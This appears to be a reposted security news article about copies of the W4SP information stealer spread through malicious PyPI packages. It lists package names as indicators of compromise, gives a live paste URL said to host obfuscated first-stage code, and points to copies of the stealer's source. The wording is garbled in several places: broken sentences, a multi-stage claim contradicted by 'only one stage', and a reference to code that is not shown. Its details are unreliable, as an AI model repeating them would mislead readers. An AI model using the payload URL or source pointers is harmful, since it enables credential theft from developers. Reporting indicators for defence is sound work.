![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
Researchers from Phylum discovered recently that information-stealing malware was being infected into the computers of Python developers to steal their data.
They that had many names. The source code of this program shows that it’s a simple copy of W4SP, the original Stealer.
Attack Chain to Deploy Malware
This case saw a stealer drop directly into main.py rather than hiding the code or making it obvious that they are trying to escape detection.
One case has been identified in which multiple stages were used to obscure and obfuscate the attacker’s intent. The attacker pulled obfuscated codes from the website klgrth.io using the package chazz. He used only one stage to do this.
The first stage of the code stealer and injector codes are very similar. This has been obscured with BlankOBF. It’s still an obfuscation programme. It will reveal the Leaf $tealer as soon as it has been de-obfuscated.
Malicious Packages
Below are IOC packages similar to the ones listed. We can also expect that this list will continue growing over time.
- Modulesecurity “Celestial Stealer”
- informmodule – “Leaf $tealer”
- chazz – first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
- randomtime – “ANGEL stealer”
- proxygeneratorbil “@skidSTEALER”
- Easycordey “@skid Stealer”
- easycordeyy – “@skid Stealer”
- tomproxies – “@skid STEALER”
- Sys-ej “Hyperion Obfuscated Code”
- infosys – “@734 Stealer”
- sysuptoer – “BulkFA Stealer”
- nowsys – “ANGEL Stealer”
- upamonkws “PURE Stealer”
- captchaboy – “@skid STEALER”
- proxybooster “Fade Stealer”
W4SP Copy
W4SP’s initial publication in loTus’s repository was disabled by GitHub staff. This is due to violating the T&Cs of GitHub. It will therefore no longer be found.
Phylum has had for some time the mission of monitoring these threats actors to try to bring down their infrastructure due to their pervasive and egregious nature.
After the W4SP Stealer repo was deleted, it was found that multiple copies of W4SP Stealer began flashing with different names. Threat actors are even distributing this new stealer through PyPI, which indicates that it’s becoming a serious threat.
W4SP was found to have been stored in 2 GitHub repositories, under 2 different aliases. Each with its own purpose.
- Satan Stealer
- angel-stealer
You can find a copy here of the original source, and earlier versions of W4SP hosted on an account titled aceeontop.
W4SP Stealer and their imitations will continue to be a part of the community for a long time.
As time goes by, there will be an increase in the number and persistence of these criminals, as well as their level of sophistication. Phylum, however, was able to ensure that supply chain attacks would be prevented and blocked because its platform has the capability of doing this.
DDoS Protection For Applications –
